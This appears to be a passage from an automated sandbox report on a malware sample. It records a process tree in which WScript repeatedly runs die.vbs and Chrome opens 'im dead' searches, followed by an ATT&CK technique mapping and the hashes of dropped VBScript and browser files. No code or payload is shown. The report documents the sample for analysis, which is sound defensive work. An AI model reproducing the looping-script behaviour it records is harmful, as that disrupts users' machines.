  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:7812
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:8168
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:8184
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:4412
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:2340
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:8104
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:8096
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:8344
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:8360
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:8368
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
      "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.google.com/search?q=im+dead
      4⤵
      PID:8652
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x104,0x108,0x10c,0xd8,0x110,0x7ffaaefdab58,0x7ffaaefdab68,0x7ffaaefdab78
        5⤵
        
        PID:8676
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Windows\die.vbs"
      4⤵
      PID:8664

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4456

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
d4ff3603ae1515f18f286a39197cea53

SHA1
93cc9863a19d881501cc056f7d8ea709a8efe4a9

SHA256
26e8881dd0ec0b294ee2bc487c7205ac460f7d85c3d9944337c2d3762ab32d7a

SHA512
cf8f42798e6aff6952cbc49bfc928179d88035c9c29d52149ec918d4393bdfa94450dc7134bcef5e32bf5878098584e1da0dbb60432352c5c13c1f2dbbe4c4cf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000001

Filesize
211KB

MD5
151fb811968eaf8efb840908b89dc9d4

SHA1
7ec811009fd9b0e6d92d12d78b002275f2f1bee1

SHA256
043fd8558e4a5a60aaccd2f0377f77a544e3e375242e9d7200dc6e51f94103ed

SHA512
83aface0ab01da52fd077f747c9d5916e3c06b0ea5c551d7d316707ec3e8f3f986ce1c82e6f2136e48c6511a83cb0ac67ff6dc8f0e440ac72fc6854086a87674

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000002

Filesize
24KB

MD5
c594a826934b9505d591d0f7a7df80b7

SHA1
c04b8637e686f71f3fc46a29a86346ba9b04ae18

SHA256
e664eef3d68ac6336a28be033165d4780e8a5ab28f0d90df1b148ef86babb610

SHA512
04a1dfdb8ee2f5fefa101d5e3ff36e87659fd774e96aa8c5941d3353ccc268a125822cf01533c74839e5f1c54725da9cc437d3d69b88e5bf3f99caccd4d75961

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\4585e247b17248b3_0

Filesize
280B

MD5
f170d7f88936f4b0e168a96e99a9a9de

SHA1
91bd7c1d5b5e3d8b2911453a9b16102f7ebc82cf

SHA256
b1a937735906595eb87cf4ed35a6334986a49b0716d1a630cda286b4c029b372

SHA512
53140cf5130a11046c9a934d91cea4868bbfa5d27754ba0b1439e8a42c5bfacf3ff15fa9563ee8af1e7476cf2301d84b75245cc084ea6ab5dae20eb66a3bbbff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\70012577ffcbf7a9_0

Filesize
19KB

MD5
fa399b3ea7679d9dac027002464c2307

SHA1
3d074438299ba69effe73174ad8efad90a207835

SHA256
da39eb0e71195928748eeb1a56894e2fe06607fd084f3a4fbab1e7c0f6ed0b04

SHA512
0e037bc7152f33ce9f4fb286228991344e83c0b143c74098dade619c2129a5413a2df16306da6f297bbe30ef7df529c3ccf30a9d76b23eb2fbf80e3b48cd0c70

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\738184b4bb16e32c_0

Filesize
2KB

MD5
5c38ed32b0f1cae276cfc4c4c39cf400

SHA1
694543552d2c8503146dcdd1cdb1a4ede811c934

SHA256
79d653e0c1eb6c5a8e9c98dddc32a3a5429a61d94071754c81f7928848ace11d

SHA512
e14c702eed34c1511c2d48e5fdf4bf6959cd1bc14e2aa78e171836946d1fd8fd1f73cf084f73096812c011c598449b67aee789cc08536a5dd1c87f89f40e83b0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\ec5ea768045d5c65_0

Filesize
289B

MD5
9638505b06285ee857a4a132c621b170

SHA1
35f85792640fb363a2ae19789e1896372d622a07

SHA256
cf32760dea35090a9125875cf8322f50c68940a3dd2ff6ac16cbbf810c928f85

SHA512
179f07373a070ada0ca92a193f8990f31110b1ee35fc0e2f6c0330e99a905db181e316c16ba0c15786b38eba364256778f201bddf9fd126189606a7102a135e3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\fae9d39d49fd0d8f_0

Filesize
339KB

MD5
cde7391b355b197b2c4ec5620dcd09cf

SHA1
d941d8b94726966d72a8c362bb46a7a746712bac

SHA256
80997491a2f7debb3272f9c7aac0dd64abee0ef86031bf3eb14294a283e6fe67

SHA512
cf6cb7598053217f2aedfa630e2a709681cf629fd4474f2c4cc45939f084455b8719b9b552c22f23bc698bf4856c6dfde82a9aecc2afc4db93fd0c43933e55bc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
216B

MD5
83744bced1d45fed4771dfb781efccd9

SHA1
58871836786a91267130531c2668f35eefc621dc

SHA256
1917c87024cbd9105251536fb40a342f707b435b3c828d104847dfccf74f315a

SHA512
adbaa2aab98ff6a59e91ca7d3682d4f2187e3b5d8de2873fbb43caf3ea3a8e1f92123a4d54417f89cffc2796c5a6de42c3dc7ed431f0110e942d2f46c6dc7b02

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
839cd605676b806495c99a92f7a80aa8

SHA1
838d02e6a7f608ba95dff26db2465823e6df50dc

SHA256
e21d22cf377615fff8eaae676226d7f4533a0cdfdc9fa9fca5ad9c3c955c1197

SHA512
43741f5969c2b27ea06bbd6707804158a682cdcec5253e60d1253bc1547fa312e76cf53478ed5ced613be2fbaffda273b723c740f07ebc9d1015ce0960429ba0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
3ed5a702565d1354711c5da86629c345

SHA1
e7e12470c5b037c09ac577c975183f02de42628a

SHA256
53f088ba6f7a0a22df0bdb87ab1997b7f65c48f5c38a3d9470fc6e30bcc06700

SHA512
dab4e0186bcb2c012a0877ee7367a32f27244a56f06e002d5325d4ec40e9404e3dd9ee2ebe91a49e6069dd993701cc6679fbfe867e6cf639d64badb5369570c8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
354B

MD5
9876a21707722a428e66028f7eed9178

SHA1
69807f6c8137cc87bb5a9d940ed55e1c670398ef

SHA256
13dc6d0ed570a954d28e9fd0692c6c474ba588fae72c009a755689be2379e208

SHA512
3ab251072308ebe183c1f6436b617a74edd7116f3cd9ac42cb98ad13df4ddefd864accc1ae0afc87da31a9755074f23c81aaab40af1dac770a42a4f4bc44de7f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
ac31d8091dd6beeeba4700d12d65e2c5

SHA1
e2c53a5dbc87596a346c76f963dc4a635fb16f6d

SHA256
0bba20f90b345b8f391ab385cf1da1d9ce8fa830f5f95d41c1d50652e6fa5c11

SHA512
9b84e5dd9f140a28ced0106122f60b7b311894ae7e03371a616969230765ab39c0a4f4a0214f0a1fc4798c8e043564bb001e4a9bf771a53c68fdab7c0fd47fdb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
dd7c72128fcea4d0d78cd623996f5b9d

SHA1
df00358f27550a2920273cfcbea49a801183083e

SHA256
8feaef3669bad985b22de032799c268b6ae02bef95f0a77ee47d1f47669c6cac

SHA512
b931b35217a58ae092b4a0b177ab6d851c28bce0ffff317ca9c8522d2c40c77e5e9f5278e63406ab919c127d3c6da0d3ff4b302e63a9a8527c47357a42714fcc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Filesize
16KB

MD5
8de2e9e4fdffb6f306abcba013917a94

SHA1
ea71764f2eaaf1b89a1fed9e2a6ed526486882f1

SHA256
c98546b767dbe7542ba2d58ffc501deb34d411f713f017e807355108a01b91aa

SHA512
28b660ff003515348ba4869b7dcc84ee2688f3070f0e1abf04e7bc6f0fce07b3385c1eb03f29bcb16e90b5355d4224d0c314e71597e5ede258639f86ac99f5bd

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
144KB

MD5
0c39bb11752eed12ea57e65b3657ced9

SHA1
75edff7ca3bb699951194d33375b969487908a68

SHA256
6687a0efb2228a48186f68806f88ca0d8eeefc223509d9a1a08c0277a19ab6e2

SHA512
25c4f8f67c49a6dc59450f75783c64fe3f11d82446a12be9be3d95773b9ef6d64365d30ac91098bb23f38010a795d6112542343f41a56479f66812f849004e1a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
144KB

MD5
dc5dd072523d151926be734c0ce7a6a3

SHA1
44e93c7f8928934c37d3e1879f52b4301808cb77

SHA256
3a01438dced49e46f3ea9ffcd30e1dad645d17300adf0f7c42008526ea893acb

SHA512
415feccbf2e3a2b4668544b27c82d54f48cb7305fa60823934d172dd6f8bee60f56ba1555ef1ae480fdecc48cd162af39771523e04f1c4215503f4d535c5b7b9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
286KB

MD5
01d6fa02cabe40132148671c1e63fa46

SHA1
98dc8c161194d2e02ec739fab13d0b394682fc87

SHA256
1013f8fefcd74a42a30d38b8184021000c75e02b185094f337a67f94f9bfacb7

SHA512
7b0c5ad3e01b0c851525585b623a26eedd9c42d519efd08961ff50037eb6a8685aeb10c6c44f00f91ccab46eacb37b1b167e85d299b3f5d1c57b60fb6a21d048

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vrpi5epj.3e1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\die.vbs

Filesize
32B

MD5
b359ce387f90891ebacbbd74ad115a51

SHA1
ea46a4b6433224920c20ec4e5e29a225c2f9a9bd

SHA256
d5d5c0f648b1dd16bae4ec6ca8b66836d39c0c4672b4feaf02adad314808dbd0

SHA512
1edf92cc435fc3695c7674c8403659d3ea800cac400240916b198370e455f1b7737d72337b3a04e50e9fed47e11bef3034b7fba869d69eda6703f9b761ded7fd

Download Submit
C:\Windows\loop.vbs

Filesize
58B

MD5
a1ea23487c900694eb60e50163a705b0

SHA1
9214762e43f4cabf1756898e49ea73f04f3b355d

SHA256
047c8796ad33393c745f83f331f682976aa4cc69557e355d4b4b3f4aec8a4293

SHA512
72356ffc75145402bac0f145a04a049722e732365747ac68f38de6dfcf144d80dac3896a9cc4fddf3e5ac6522ef24596e636b9914b122efc47335ec4ccd08144

Download Submit
C:\Windows\loop.vbs

Filesize
76B

MD5
b7492070efdb4abe9693dd2a9d0c0dd9

SHA1
b070c600fd24f7216868a3d90b31f3aabe774b48

SHA256
7349cd29f7507b9486abacdb5c60be13a667da1107364c41670761cd17604ae7

SHA512
681337efbb77f38c9a66c1acfb32ab3abb99c2c5e243700e236c5ef3132fd3e70098d892bc3c9f994f37ea4b1a042e582ab314e52c0620201cee044cfa34cfb2

Download Submit
C:\Windows\loop.vbs

Filesize
89B

MD5
c4fbc63196b94fc90ee9880027cd2b48

SHA1
7e8c32b5f49a1886f604efc476af1cb2bddb6a1c

SHA256
a011f45e67501d98db568a22619651169d8f441747c121e35e5f0f6e67160803

SHA512
b79bc81de5cda30eee6b5958f570013c112b0d3aba0c94fe0fe9a27da353e43e8f069356d540a2f78a2869f8b22f3d8832bfa1679043d85614e50707397342ce

Download Submit
C:\Windows\loop.vbs

Filesize
157B

MD5
2b45f57b4741dee1bac53a25c254695c

SHA1
7a5b12eb44fdad6a0a2d78c68c7676e7e9f1f036

SHA256
b872d58931baa7dd7d89b4ba64c52b0e0e659d5a4ddbe8de8eeed0f1f0402da6

SHA512
6e39f5f6bf840d1bd06b87905b849b79c9a2175423c8b266bf840163e4d014cb14f8d309a4284535e458920f9d9e16b58bd65743e777a977d6229524535dfa00

Download Submit
C:\Windows\loop.vbs

Filesize
193B

MD5
fc99d843025cbc320d8f3dc20b171e8d

SHA1
9d02fb9978fac6004e2c65f64be6ceadb5376451

SHA256
6a38ef7325e35f34d82334e4bdc4008b079af886cd6611c99b3ff527d7bcecc9

SHA512
cac098cf6bc9abf1cdb2ab0967215ba03ef3c7763dac271be642d451864d6edfed03b64bccd07fa00c2456871f88a095d18770700aa1feec201d267a344152f9

Download Submit
C:\Windows\loop.vbs

Filesize
211B

MD5
ee721e81e732ed9aea585d3ee0705814

SHA1
59fb4609948025255d00dc0f47508a9e1166a8b0

SHA256
d45ae5d6dd161f8ac471396d858b09270cc9ba7e4f9050f8e19c66df44479e23

SHA512
ab0f28c10844c7d1e659b0de0e5fb94eab3508717c44c560dba3e01bca4295c35929edb2db855fc1ab7ffc1bd79061433ba9c67d91db09ad3ea1c7e8a8683f2a

Download Submit
C:\Windows\loop.vbs

Filesize
218B

MD5
91d0599d7a681e6935417d54cebfc23d

SHA1
73f44599eabd428d292b1ac639041e5b51eb6f22

SHA256
191e355fe4baeafe96661deb139af79c8b246e6d961c14dd096105a57d4980e4

SHA512
5cb882f526d03f7aa466ba7f9d31404f168ee7f7c33f80175f6395f080a6625a6d4d5554c4d59b6fb0e5cb57fc9169663074e679638d53f928dab12b6a11320e

Download Submit
memory/384-0-0x00007FFAA0163000-0x00007FFAA0165000-memory.dmp

Filesize
8KB

Download
memory/384-12-0x00007FFAA0160000-0x00007FFAA0C21000-memory.dmp

Filesize
10.8MB

Download
memory/384-11-0x00007FFAA0160000-0x00007FFAA0C21000-memory.dmp

Filesize
10.8MB

Download
memory/384-33-0x00007FFAA0160000-0x00007FFAA0C21000-memory.dmp

Filesize
10.8MB

Download
memory/384-1-0x000002BE1B050000-0x000002BE1B072000-memory.dmp

Filesize
136KB

Download